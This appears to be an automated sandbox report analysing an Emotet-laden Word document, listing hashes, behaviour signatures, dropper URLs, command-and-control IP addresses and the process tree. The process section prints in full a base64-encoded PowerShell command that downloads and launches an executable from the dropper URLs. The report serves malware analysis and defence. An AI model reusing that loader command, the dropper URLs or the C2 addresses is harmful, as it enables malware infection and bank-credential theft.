Overview

overview

10

Static

static

8

emotet_doc

windows7_x64

10

Analysis

  • max time kernel
    30s
  • max time network
    19s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    31-07-2020 22:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    7ad485f73ed801fe057ee89153970c59e3dd7331d317808f0f04c7a138d6aebc.doc

  • Size

    174KB

  • MD5

    975d7808f3cc188bdf6a51329b580a7c

  • SHA1

    e16ed570557e7dc784c70f40e7d23df9f6b323e8

  • SHA256

    7ad485f73ed801fe057ee89153970c59e3dd7331d317808f0f04c7a138d6aebc

  • SHA512

    685a8c85482f606af3cbf9ae2a3fbfd14f2e7c4f4c5d4f737a573f34db28a6a5cd1e4bb08e55d8651cafc06d6b117e598d3de0dacc1fa61a5eb24b45f4e16880

Score
10/10
trojanbankeremotet

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://prolicitar.com.br/privilege/VwWMjYDU/
exe.dropper

http://proreclame.nl/assets/Riw/
exe.dropper

http://www.meltonian.net/Blog/Zaviixl730/
exe.dropper

http://www.mollymoody.com/iRVKRMq/
exe.dropper

https://mwrouse.com/cs2300/qVJaPCy/

Extracted

Family

emotet

C2

187.64.128.197:80

198.57.203.63:8080

163.172.107.70:8080

212.112.113.235:80

157.7.164.178:8081

181.167.35.84:80

212.156.133.218:80

185.142.236.163:443

181.143.101.19:8080

75.127.14.170:8080

115.165.3.213:80

190.55.233.156:80

139.59.12.63:8080

144.139.91.187:80

37.70.131.107:80

181.113.229.139:443

41.185.29.128:8080

177.37.81.212:443

5.79.70.250:8080

78.188.170.128:80
rsa_pubkey.plain

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Emotet Payload 2 IoCs

    Detects Emotet payload in memory.

  • Drops file in System32 directory 2 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 280 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

    trojanbankeremotet
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7ad485f73ed801fe057ee89153970c59e3dd7331d317808f0f04c7a138d6aebc.doc"
    1⤵
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:852
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABWAE0AQgBBAE8AaABvAHcAPQAnAEEASgBEAFEAUwBrAHMAdQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYwBVAGAAUgBJAGAAVAB5AHAAYABSAE8AVABPAGMAYABPAGwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABIAFAATABCAEkAYQB6AGcAIAA9ACAAJwA3ADUAMQAnADsAJABNAEwASgBUAFoAeQB4AGgAPQAnAFcATABMAFkATQBkAGUAZgAnADsAJABXAEgATgBDAFcAYwBqAHIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEgAUABMAEIASQBhAHoAZwArACcALgBlAHgAZQAnADsAJABWAFQARgBOAEEAdwBqAGkAPQAnAFEAVwBBAEoATgBoAHAAdAAnADsAJABIAFcAVQBTAEMAcgBxAGEAPQAuACgAJwBuAGUAdwAnACsAJwAtAG8AYgBqAGUAJwArACcAYwB0ACcAKQAgAE4ARQB0AC4AdwBlAGIAQwBsAGkARQBuAHQAOwAkAFAASQBMAEQAUQBzAGYAeAA9ACcAaAB0AHQAcAA6AC8ALwBwAHIAbwBsAGkAYwBpAHQAYQByAC4AYwBvAG0ALgBiAHIALwBwAHIAaQB2AGkAbABlAGcAZQAvAFYAdwBXAE0AagBZAEQAVQAvACoAaAB0AHQAcAA6AC8ALwBwAHIAbwByAGUAYwBsAGEAbQBlAC4AbgBsAC8AYQBzAHMAZQB0AHMALwBSAGkAdwAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AZQBsAHQAbwBuAGkAYQBuAC4AbgBlAHQALwBCAGwAbwBnAC8AWgBhAHYAaQBpAHgAbAA3ADMAMAAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AbwBsAGwAeQBtAG8AbwBkAHkALgBjAG8AbQAvAGkAUgBWAEsAUgBNAHEALwAqAGgAdAB0AHAAcwA6AC8ALwBtAHcAcgBvAHUAcwBlAC4AYwBvAG0ALwBjAHMAMgAzADAAMAAvAHEAVgBKAGEAUABDAHkALwAnAC4AIgBzAGAAUABMAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAE0AUwBCAEIAUQBhAHoAegA9ACcATwBMAFEATgBPAGYAdgB5ACcAOwBmAG8AcgBlAGEAYwBoACgAJABZAFQATQBYAFQAZQB6AHMAIABpAG4AIAAkAFAASQBMAEQAUQBzAGYAeAApAHsAdAByAHkAewAkAEgAVwBVAFMAQwByAHEAYQAuACIARABgAG8AVwBuAGwATwBBAGAARABmAGkAYABMAEUAIgAoACQAWQBUAE0AWABUAGUAegBzACwAIAAkAFcASABOAEMAVwBjAGoAcgApADsAJABFAFkATABOAEsAcgBpAGgAPQAnAE8ATgBYAEUASgB0AHAAcgAnADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAFcASABOAEMAVwBjAGoAcgApAC4AIgBMAGUAYABOAEcAdABoACIAIAAtAGcAZQAgADIAOQA2ADAANAApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwBSAEUAYABBAHQAZQAiACgAJABXAEgATgBDAFcAYwBqAHIAKQA7ACQAVQBEAEYATwBBAGIAdQB3AD0AJwBEAEgAVgBPAFAAZwBrAHUAJwA7AGIAcgBlAGEAawA7ACQAWQBJAEsAUwBKAG8AawBtAD0AJwBKAEMAWABYAFcAdAB6AGUAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWQBLAEsATABQAHUAagBkAD0AJwBUAFoASQBYAFkAeQBsAHMAJwA=
    1⤵
    • Process spawned unexpected child process
    • Drops file in System32 directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Blacklisted process makes network request
    PID:1664
  • C:\Users\Admin\751.exe
    C:\Users\Admin\751.exe
    1⤵
    • Drops file in System32 directory
    • Suspicious use of WriteProcessMemory
    • Suspicious use of SetWindowsHookEx
    • Executes dropped EXE
    PID:1928
    • C:\Windows\SysWOW64\msftedit\winnsi.exe
      "C:\Windows\SysWOW64\msftedit\winnsi.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: EnumeratesProcesses
      • Executes dropped EXE
      PID:1644

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/852-2-0x0000000008890000-0x0000000008894000-memory.dmp

    Filesize

    16KB

    Download

  • memory/852-4-0x0000000006F00000-0x0000000007100000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/852-5-0x000000000ACD0000-0x000000000ACD4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/852-6-0x000000000BD50000-0x000000000BD54000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1928-10-0x0000000000300000-0x000000000030C000-memory.dmp

    Filesize

    48KB

    Download